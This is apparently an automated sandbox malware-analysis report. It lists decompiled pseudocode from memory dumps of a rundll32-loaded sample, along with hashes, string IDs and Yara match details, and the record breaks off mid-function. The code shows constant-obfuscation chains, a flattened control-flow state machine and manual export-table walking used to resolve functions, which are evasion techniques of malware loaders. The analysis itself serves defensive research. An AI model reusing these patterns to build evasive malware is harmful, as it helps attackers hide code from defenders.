                                                                      Function 01FF2208, Relevance: 2.6, Strings: 2, Instructions: 126COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E01FF2208(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v332;
				char _t130;
				void* _t131;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				char* _t140;
				intOrPtr* _t156;

				_v60 = _v60 & 0x00000000;
				_v72 = 0xe3568;
				_v68 = 0x2883ad;
				_v64 = 0x1a7bf3;
				_v44 = 0xf414;
				_v44 = _v44 ^ 0x8770b590;
				_v44 = _v44 ^ 0x87700964;
				_v36 = 0xb854;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x005c6a34;
				_v12 = 0x1e6f;
				_v12 = _v12 ^ 0xf4069a1b;
				_v12 = _v12 << 0xd;
				_t156 = __ecx;
				_t137 = 0x57;
				_v12 = _v12 / _t137;
				_v12 = _v12 ^ 0x0265e4d2;
				_v24 = 0x8571;
				_v24 = _v24 + 0xffff3aa5;
				_v24 = _v24 | 0x45c7521f;
				_v24 = _v24 ^ 0xffffa68c;
				_v56 = 0xe2bc;
				_v56 = _v56 + 0xac59;
				_v56 = _v56 ^ 0x0001c024;
				_v28 = 0xc379;
				_v28 = _v28 >> 5;
				_v28 = _v28 >> 5;
				_v28 = _v28 ^ 0x00005cee;
				_v32 = 0x29f6;
				_t138 = 0x70;
				_v32 = _v32 / _t138;
				_t139 = 0x16;
				_t140 =  &_v332;
				_v32 = _v32 / _t139;
				_v32 = _v32 ^ 0x0000381e;
				_v20 = 0x6921;
				_v20 = _v20 ^ 0xc84b8620;
				_v20 = _v20 ^ 0xee2afc44;
				_v20 = _v20 * 0x68;
				_v20 = _v20 ^ 0x976f8b66;
				_v52 = 0x2d40;
				_v52 = _v52 + 0xe0f;
				_v52 = _v52 ^ 0x00002a29;
				_v48 = 0x9fae;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x00003426;
				_v8 = 0x1268;
				_v8 = _v8 + 0xffffad14;
				_v8 = _v8 + 0xfbd;
				_v8 = _v8 | 0x03aa70af;
				_v8 = _v8 ^ 0xffff927e;
				_v40 = 0x43b2;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x00005849;
				_v16 = 0x2e64;
				_v16 = _v16 | 0x5ee4e259;
				_v16 = _v16 * 0x35;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 ^ 0x0000e727;
				while(1) {
					_t130 =  *_t156;
					if(_t130 == 0) {
						break;
					}
					if(_t130 == 0x2e) {
						 *_t140 = 0;
					} else {
						 *_t140 = _t130;
						_t140 = _t140 + 1;
						_t156 = _t156 + 1;
						continue;
					}
					L6:
					_t131 = E0200A03C( &_v332, _v44, _v36, _v12, _v24);
					_t157 = _t131;
					if(_t131 != 0) {
						L8:
						_push(E02001D2B(_v32, _t156 + 1, _v20, _v52) ^ 0x0c5c2292);
						_push(_v16);
						_push(_v40);
						_push(_v8);
						return E0200C4DD(_v48, _t157);
					}
					_t135 = E01FFF04C( &_v332, _v56, _v28);
					_t157 = _t135;
					if(_t135 != 0) {
						goto L8;
					}
					return _t135;
				}
				goto L6;
			}





























                                                                      0x01ff2211
                                                                      0x01ff2217
                                                                      0x01ff221e
                                                                      0x01ff2225
                                                                      0x01ff222c
                                                                      0x01ff2233
                                                                      0x01ff223a
                                                                      0x01ff2241
                                                                      0x01ff2248
                                                                      0x01ff224c
                                                                      0x01ff2253
                                                                      0x01ff225a
                                                                      0x01ff2261
                                                                      0x01ff226c
                                                                      0x01ff226e
                                                                      0x01ff2273
                                                                      0x01ff2278
                                                                      0x01ff227f
                                                                      0x01ff2286
                                                                      0x01ff228d
                                                                      0x01ff2294
                                                                      0x01ff229b
                                                                      0x01ff22a2
                                                                      0x01ff22a9
                                                                      0x01ff22b0
                                                                      0x01ff22b7
                                                                      0x01ff22bb
                                                                      0x01ff22bf
                                                                      0x01ff22c6
                                                                      0x01ff22d0
                                                                      0x01ff22d5
                                                                      0x01ff22dd
                                                                      0x01ff22e0
                                                                      0x01ff22e6
                                                                      0x01ff22e9
                                                                      0x01ff22f0
                                                                      0x01ff22f7
                                                                      0x01ff22fe
                                                                      0x01ff2309
                                                                      0x01ff230c
                                                                      0x01ff2313
                                                                      0x01ff231a
                                                                      0x01ff2321
                                                                      0x01ff2328
                                                                      0x01ff232f
                                                                      0x01ff2333
                                                                      0x01ff233a
                                                                      0x01ff2341
                                                                      0x01ff2348
                                                                      0x01ff234f
                                                                      0x01ff2356
                                                                      0x01ff235d
                                                                      0x01ff2364
                                                                      0x01ff2368
                                                                      0x01ff236f
                                                                      0x01ff2376
                                                                      0x01ff2381
                                                                      0x01ff2384
                                                                      0x01ff2388
                                                                      0x01ff2399
                                                                      0x01ff2399
                                                                      0x01ff239d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff2393
                                                                      0x01ff23a1
                                                                      0x01ff2395
                                                                      0x01ff2395
                                                                      0x01ff2397
                                                                      0x01ff2398
                                                                      0x00000000
                                                                      0x01ff2398
                                                                      0x01ff23a4
                                                                      0x01ff23b6
                                                                      0x01ff23bb
                                                                      0x01ff23c2
                                                                      0x01ff23dc
                                                                      0x01ff23f4
                                                                      0x01ff23f5
                                                                      0x01ff23f8
                                                                      0x01ff23fb
                                                                      0x00000000
                                                                      0x01ff2406
                                                                      0x01ff23d0
                                                                      0x01ff23d5
                                                                      0x01ff23da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff240e
                                                                      0x01ff240e
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4j\$Y^
                                                                      • API String ID: 0-2203625362
                                                                      • Opcode ID: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
                                                                      • Instruction ID: c7eb2fda4de8f23e86eaf8a6801956826f5e5c0592799e48bf45350fe949c175
                                                                      • Opcode Fuzzy Hash: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
                                                                      • Instruction Fuzzy Hash: 81511271C0131AEBEF19CFA5D94A5EEBBB1FF04304F208199D515B62A0D7B90A5ACF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02003F4F, Relevance: 2.6, Strings: 2, Instructions: 115COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E02003F4F(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t63;
				signed int _t65;
				signed int _t69;
				signed int _t70;
				void* _t79;
				signed int _t80;
				void* _t81;
				signed int _t84;
				intOrPtr* _t87;
				signed int* _t88;

				_t70 = __ecx;
				_t88 =  &_v564;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x208792;
				_v540 = 0xd4e9;
				_v540 = _v540 + 0xffffc88b;
				_v540 = _v540 ^ 0x0000d9d0;
				_v532 = 0x336b;
				_v532 = _v532 | 0xfe809e09;
				_v532 = _v532 ^ 0xfe80eed9;
				_v564 = 0x8dd7;
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x316f6ec5;
				_v564 = _v564 + 0xffffc640;
				_v564 = _v564 ^ 0x307484c3;
				_v536 = 0x3e91;
				_v536 = _v536 + 0xa90d;
				_v536 = _v536 ^ 0x0000a803;
				_v560 = 0xf01b;
				_v560 = _v560 << 0x10;
				_v560 = _v560 * 0x4f;
				_t87 = __edx;
				_v560 = _v560 ^ 0x18550a74;
				_t69 = __ecx;
				_v552 = 0x212a;
				_t81 = 0x2a877a8b;
				_v552 = _v552 * 0x19;
				_v552 = _v552 ^ 0x00030550;
				_v544 = 0xd358;
				_v544 = _v544 | 0x5b8e85e0;
				_v544 = _v544 ^ 0x5b8ed83a;
				_v556 = 0x81e1;
				_v556 = _v556 ^ 0x5f3d7dd3;
				_v556 = _v556 ^ 0x5f3de0ae;
				_t80 = _v556;
				_v548 = 0x11a6;
				_v548 = _v548 << 1;
				_v548 = _v548 ^ 0x000056ff;
				while(_t81 != 0xa9a8994) {
					if(_t81 == 0x1592b590) {
						_push( &_v520);
						_t63 = E0200B165(_t69, _t87);
						asm("sbb esi, esi");
						_t70 = 0x1ff1020;
						_t84 =  ~_t63 & 0xf51449f8;
						L9:
						_t81 = _t84 + 0x29fbdc3d;
						continue;
					}
					if(_t81 == 0x1f102635) {
						_push(0);
						_push(0);
						_push(_v544);
						_push(_v552);
						_push(_v560);
						_push(_v536);
						_push( &_v520);
						_push(0);
						_t65 = E01FF6417(_v564, __eflags);
						_t88 =  &(_t88[8]);
						asm("sbb esi, esi");
						_t84 =  ~_t65 & 0xe09ead57;
						__eflags = _t84;
						goto L9;
					}
					if(_t81 == 0x29fbdc3d) {
						return E01FFDE81(_v556, _t80, _v548);
					}
					if(_t81 != 0x2a877a8b) {
						L12:
						__eflags = _t81 - 0x1e6f5ee2;
						if(__eflags != 0) {
							continue;
						} else {
							return _t65;
						}
						L15:
						return _t65;
					}
					_t79 = 0x50;
					_t65 = E01FF54FB(_t79);
					_t80 = _t65;
					_t70 = _t70;
					if(_t80 != 0) {
						_t81 = 0x1592b590;
						continue;
					}
					goto L15;
				}
				 *((intOrPtr*)(_t80 + 0x44)) = _t69;
				_t81 = 0x1e6f5ee2;
				 *_t80 =  *0x2011084;
				 *0x2011084 = _t80;
				goto L12;
			}

























                                                                      0x02003f4f
                                                                      0x02003f4f
                                                                      0x02003f55
                                                                      0x02003f5a
                                                                      0x02003f62
                                                                      0x02003f6a
                                                                      0x02003f72
                                                                      0x02003f7a
                                                                      0x02003f82
                                                                      0x02003f8a
                                                                      0x02003f92
                                                                      0x02003f99
                                                                      0x02003f9d
                                                                      0x02003fa4
                                                                      0x02003fab
                                                                      0x02003fb2
                                                                      0x02003fba
                                                                      0x02003fc2
                                                                      0x02003fca
                                                                      0x02003fd2
                                                                      0x02003fe0
                                                                      0x02003fe4
                                                                      0x02003fe6
                                                                      0x02003fee
                                                                      0x02003ff0
                                                                      0x02003ff8
                                                                      0x02004002
                                                                      0x02004006
                                                                      0x0200400e
                                                                      0x02004016
                                                                      0x0200401e
                                                                      0x02004026
                                                                      0x0200402e
                                                                      0x02004036
                                                                      0x0200403e
                                                                      0x02004042
                                                                      0x0200404a
                                                                      0x0200404e
                                                                      0x02004056
                                                                      0x02004068
                                                                      0x020040f5
                                                                      0x020040fd
                                                                      0x02004107
                                                                      0x02004109
                                                                      0x0200410a
                                                                      0x020040e4
                                                                      0x020040e4
                                                                      0x00000000
                                                                      0x020040e4
                                                                      0x02004074
                                                                      0x020040b1
                                                                      0x020040b3
                                                                      0x020040b5
                                                                      0x020040bd
                                                                      0x020040c1
                                                                      0x020040c5
                                                                      0x020040cd
                                                                      0x020040ce
                                                                      0x020040d0
                                                                      0x020040d5
                                                                      0x020040dc
                                                                      0x020040de
                                                                      0x020040de
                                                                      0x00000000
                                                                      0x020040de
                                                                      0x0200407c
                                                                      0x00000000
                                                                      0x02004144
                                                                      0x02004088
                                                                      0x02004127
                                                                      0x02004127
                                                                      0x0200412d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200414f
                                                                      0x0200414f
                                                                      0x0200414f
                                                                      0x02004099
                                                                      0x0200409a
                                                                      0x0200409f
                                                                      0x020040a1
                                                                      0x020040a4
                                                                      0x020040aa
                                                                      0x00000000
                                                                      0x020040aa
                                                                      0x00000000
                                                                      0x020040a4
                                                                      0x02004112
                                                                      0x02004115
                                                                      0x0200411f
                                                                      0x02004121
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *!$k3
                                                                      • API String ID: 0-1396716965
                                                                      • Opcode ID: 7d0b1fc123c8e7fa04d11ad868293d2a6e674a265442b316f67264ab0fb49612
                                                                      • Instruction ID: 7f518d9b9bc8b147eb0af21d60fd201e909b162b092945691d45f6ac3d24a309
                                                                      • Opcode Fuzzy Hash: 7d0b1fc123c8e7fa04d11ad868293d2a6e674a265442b316f67264ab0fb49612
                                                                      • Instruction Fuzzy Hash: B541D0728083018FE355CF15D88555BFBE0FB94358F014A1DE6D9AB2A0D3B58A49CF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002434C3, Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *!$k3
                                                                      • API String ID: 0-1396716965
                                                                      • Opcode ID: eae0f129622ca1be1331d6256decdb13aa3d9fafa60389adb5a47b4304c4b6e5
                                                                      • Instruction ID: 34966487475ab03651524f21114365b20cb9e5fcf188754d6daa5beee3caf3fd
                                                                      • Opcode Fuzzy Hash: eae0f129622ca1be1331d6256decdb13aa3d9fafa60389adb5a47b4304c4b6e5
                                                                      • Instruction Fuzzy Hash: DE41CC724083129BD318DF15D88555BFBE0FB88358F124A1DF5D9AB2A0D3B48A5A8F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF3938, Relevance: 2.6, Strings: 2, Instructions: 98COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E01FF3938(intOrPtr __ecx, void* __edx) {
				intOrPtr _t84;
				void* _t89;
				void* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t112;
				intOrPtr _t113;
				intOrPtr _t116;
				void* _t117;
				void* _t118;

				_t116 =  *((intOrPtr*)(_t117 + 0x38));
				_push( *((intOrPtr*)(_t117 + 0x44)));
				 *((intOrPtr*)(_t117 + 0x24)) = __ecx;
				_push(_t116);
				_push(__edx);
				_push(__ecx);
				E02002550(__ecx);
				 *((intOrPtr*)(_t117 + 0x44)) = 0x4b2d38;
				_t118 = _t117 + 0x10;
				_t113 = 0;
				 *((intOrPtr*)(_t118 + 0x38)) = 0;
				 *(_t118 + 0x14) = 0x6eb8;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0x7c344bdb;
				_t97 = 0x3d;
				 *(_t118 + 0x18) =  *(_t118 + 0x14) / _t97;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x02096a70;
				 *(_t118 + 0x14) = 0xfd73;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xa1be20cb;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 0xf;
				_t98 = 0x57;
				 *(_t118 + 0x10) =  *(_t118 + 0x14) / _t98;
				 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x00004917;
				 *(_t118 + 0x40) = 0x3423;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xab2a12e8;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) | 0xd17ac73e;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) + 0xffff5f1a;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xfb7a79e5;
				 *(_t118 + 0x1c) = 0x40db;
				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) >> 0xa;
				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) ^ 0x00005dd2;
				 *(_t118 + 0x18) = 0xa0e8;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d9e5e;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d3eb6;
				_t84 =  *((intOrPtr*)(_t116 + 0x3c));
				_t112 =  *(_t118 + 0x18);
				 *((intOrPtr*)(_t118 + 0x30)) = _t84;
				_t95 =  *((intOrPtr*)(_t84 + _t116 + 0x78)) + _t116;
				 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t95 + 0x1c)) + _t116;
				_t100 =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
				 *((intOrPtr*)(_t118 + 0x24)) =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
				 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t95 + 0x24)) + _t116;
				while(_t112 <  *((intOrPtr*)(_t95 + 0x18))) {
					_t89 = E02002497( *((intOrPtr*)(_t100 + _t112 * 4)) + _t116,  *((intOrPtr*)(_t118 + 0x24)),  *(_t118 + 0x1c),  *((intOrPtr*)(_t118 + 0x28)),  *((intOrPtr*)(_t118 + 0x44)),  *(_t118 + 0x1c));
					_t118 = _t118 + 0x10;
					if(_t89 == 0) {
						_t113 =  *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x2c)) + ( *( *((intOrPtr*)(_t118 + 0x28)) + _t112 * 2) & 0x0000ffff) * 4)) + _t116;
						if(_t113 >= _t95) {
							_t113 =  <  ? 0 : _t113;
						}
						L7:
						return _t113;
					}
					_t100 =  *((intOrPtr*)(_t118 + 0x24));
					_t112 = _t112 + 1;
				}
				goto L7;
			}













                                                                      0x01ff393d
                                                                      0x01ff3945
                                                                      0x01ff3949
                                                                      0x01ff394d
                                                                      0x01ff394e
                                                                      0x01ff394f
                                                                      0x01ff3950
                                                                      0x01ff3955
                                                                      0x01ff395d
                                                                      0x01ff3960
                                                                      0x01ff3964
                                                                      0x01ff3968
                                                                      0x01ff3970
                                                                      0x01ff397e
                                                                      0x01ff3983
                                                                      0x01ff3989
                                                                      0x01ff3991
                                                                      0x01ff3999
                                                                      0x01ff39a1
                                                                      0x01ff39aa
                                                                      0x01ff39ad
                                                                      0x01ff39b1
                                                                      0x01ff39b9
                                                                      0x01ff39c1
                                                                      0x01ff39c9
                                                                      0x01ff39d1
                                                                      0x01ff39d9
                                                                      0x01ff39e1
                                                                      0x01ff39e9
                                                                      0x01ff39ee
                                                                      0x01ff39f6
                                                                      0x01ff39fe
                                                                      0x01ff3a06
                                                                      0x01ff3a0e
                                                                      0x01ff3a11
                                                                      0x01ff3a15
                                                                      0x01ff3a1d
                                                                      0x01ff3a27
                                                                      0x01ff3a2b
                                                                      0x01ff3a32
                                                                      0x01ff3a36
                                                                      0x01ff3a66
                                                                      0x01ff3a55
                                                                      0x01ff3a5a
                                                                      0x01ff3a5f
                                                                      0x01ff3a7c
                                                                      0x01ff3a80
                                                                      0x01ff3a90
                                                                      0x01ff3a90
                                                                      0x01ff3a94
                                                                      0x01ff3a9c
                                                                      0x01ff3a9c
                                                                      0x01ff3a61
                                                                      0x01ff3a65
                                                                      0x01ff3a65
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #4$8-K
                                                                      • API String ID: 0-2690090699
                                                                      • Opcode ID: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
                                                                      • Instruction ID: 7bbdc4876e1745939573ee3a168de874838521339d813c76de2483955a2e7f11
                                                                      • Opcode Fuzzy Hash: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
                                                                      • Instruction Fuzzy Hash: 884134B1A083019FD318CF29C88541BBBE1EF88748F00496DF995A7261D772EA59CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00232EAC, Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #4$8-K
                                                                      • API String ID: 0-2690090699
                                                                      • Opcode ID: 9d935698cac112b8a835fd4d56c32ee63574270cee71746eaa1e1968735281d7
                                                                      • Instruction ID: ea19f5e6d77a7548a361ac06bd6c587867e2c5013f72b19a40d762b37b586bb5
                                                                      • Opcode Fuzzy Hash: 9d935698cac112b8a835fd4d56c32ee63574270cee71746eaa1e1968735281d7
                                                                      • Instruction Fuzzy Hash: E74176B16083019FD718CF29C98181BBBF1FB88748F00092EF98597261C771EA69CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200C192, Relevance: 2.6, Strings: 2, Instructions: 90COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E0200C192(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v116;
				void* _t95;
				signed int _t104;
				void* _t107;
				intOrPtr _t116;

				_v8 = 0x9f81;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x31dab1ca;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03147ff0;
				_v20 = 0xa808;
				_v20 = _v20 | 0xee8c9d34;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x0ee8e1a4;
				_v40 = 0x98c1;
				_v40 = _v40 + 0xffff69a9;
				_v40 = _v40 ^ 0x000017b7;
				_v36 = 0x182a;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x00005093;
				_v24 = 0xa138;
				_v24 = _v24 + 0x4d23;
				_t104 = 0x57;
				_t116 = _a4;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00001377;
				_v12 = 0x3e71;
				_v12 = _v12 << 3;
				_v12 = _v12 << 4;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00005605;
				_v16 = 0x4dd8;
				_v16 = _v16 | 0x590e6d8f;
				_v16 = _v16 * 0x47;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 ^ 0xa71caf0d;
				_v32 = 0x3ec3;
				_v32 = _v32 << 3;
				_v32 = _v32 | 0x7ba18124;
				_v32 = _v32 ^ 0x7ba1e0dd;
				_v28 = 0xb72f;
				_v28 = _v28 + 0x7494;
				_v28 = _v28 ^ 0xe721bd43;
				_v28 = _v28 ^ 0xe720bd0c;
				_t95 =  *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 1, 0);
				_t119 = _t95;
				if(_t95 != 0) {
					E02004C37( &_v116, _v8, _v20);
					_pop(_t107);
					_v52 =  &_v116;
					_v48 = E0200A966(_v40, _v36, _t119, _t107, _v24, _v12);
					 *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 0xa,  &_v52,  &_v44);
					E02000D6D(_v16, _v32, _v28, _v48);
				}
				return 0;
			}




















                                                                      0x0200c198
                                                                      0x0200c1a1
                                                                      0x0200c1a5
                                                                      0x0200c1ac
                                                                      0x0200c1b0
                                                                      0x0200c1b7
                                                                      0x0200c1be
                                                                      0x0200c1c5
                                                                      0x0200c1c9
                                                                      0x0200c1d0
                                                                      0x0200c1d7
                                                                      0x0200c1de
                                                                      0x0200c1e5
                                                                      0x0200c1ec
                                                                      0x0200c1f0
                                                                      0x0200c1f7
                                                                      0x0200c1fe
                                                                      0x0200c20b
                                                                      0x0200c20e
                                                                      0x0200c211
                                                                      0x0200c214
                                                                      0x0200c21b
                                                                      0x0200c222
                                                                      0x0200c226
                                                                      0x0200c22a
                                                                      0x0200c22e
                                                                      0x0200c235
                                                                      0x0200c23c
                                                                      0x0200c24b
                                                                      0x0200c252
                                                                      0x0200c255
                                                                      0x0200c25c
                                                                      0x0200c263
                                                                      0x0200c267
                                                                      0x0200c26e
                                                                      0x0200c275
                                                                      0x0200c27c
                                                                      0x0200c283
                                                                      0x0200c28a
                                                                      0x0200c294
                                                                      0x0200c297
                                                                      0x0200c299
                                                                      0x0200c2a4
                                                                      0x0200c2aa
                                                                      0x0200c2ae
                                                                      0x0200c2ca
                                                                      0x0200c2d6
                                                                      0x0200c2e5
                                                                      0x0200c2eb
                                                                      0x0200c2f2

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #M$q>
                                                                      • API String ID: 0-3778844937
                                                                      • Opcode ID: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
                                                                      • Instruction ID: 34200413d3d4ea7366a10ce3ce627bba55cd802c944fd4b498d89dfb7702f9e1
                                                                      • Opcode Fuzzy Hash: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
                                                                      • Instruction Fuzzy Hash: 0441F372C0020DABEF19DFA1C94A8EEFBB5FF04304F208159D522B62A0D7B95A05DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024B706, Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #M$q>
                                                                      • API String ID: 0-3778844937
                                                                      • Opcode ID: a1e8801eff8f8b6530ebe58d1d0d3bbce165d8e7055afb7e7f6b6bc2d86411b5
                                                                      • Instruction ID: 47096adbe5e23c41e35f2eed629dc8690c6886d85febce40a95ce75428fe00e1
                                                                      • Opcode Fuzzy Hash: a1e8801eff8f8b6530ebe58d1d0d3bbce165d8e7055afb7e7f6b6bc2d86411b5
                                                                      • Instruction Fuzzy Hash: 35410472C0020DABDF09DFA1C94A8EEFBB4FF14304F208559D522B62A0D7B95A55CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02000672, Relevance: 2.6, Strings: 2, Instructions: 73COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E02000672(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				void* _t60;
				signed int _t63;
				void* _t65;
				void* _t71;
				void* _t72;
				unsigned int* _t74;

				_t65 = __ecx;
				_t74 =  &_v24;
				_v16 = 0xc222;
				_v16 = _v16 | 0x2c4811a6;
				_v16 = _v16 + 0xffff2ea9;
				_v16 = _v16 ^ 0x2c485227;
				_v4 = 0x52bd;
				_v4 = _v4 ^ 0x701b7809;
				_v4 = _v4 ^ 0x701b4439;
				_v8 = 0x440a;
				_t63 = 0x3c;
				_t71 = 0;
				_v8 = _v8 / _t63;
				_t72 = 0x1db47164;
				_v8 = _v8 ^ 0x0000441a;
				_v24 = 0x7d6d;
				_v24 = _v24 + 0xffffc5c3;
				_v24 = _v24 >> 2;
				_v24 = _v24 + 0xffffb313;
				_v24 = _v24 ^ 0xffffe3d6;
				_v12 = 0x8699;
				_v12 = _v12 + 0xfffff638;
				_v12 = _v12 ^ 0x3f0bf62e;
				_v12 = _v12 ^ 0x3f0bf546;
				_v20 = 0x2aa4;
				_v20 = _v20 + 0xffff16b8;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x5affa7fd;
				do {
					while(_t72 != 0xffebff) {
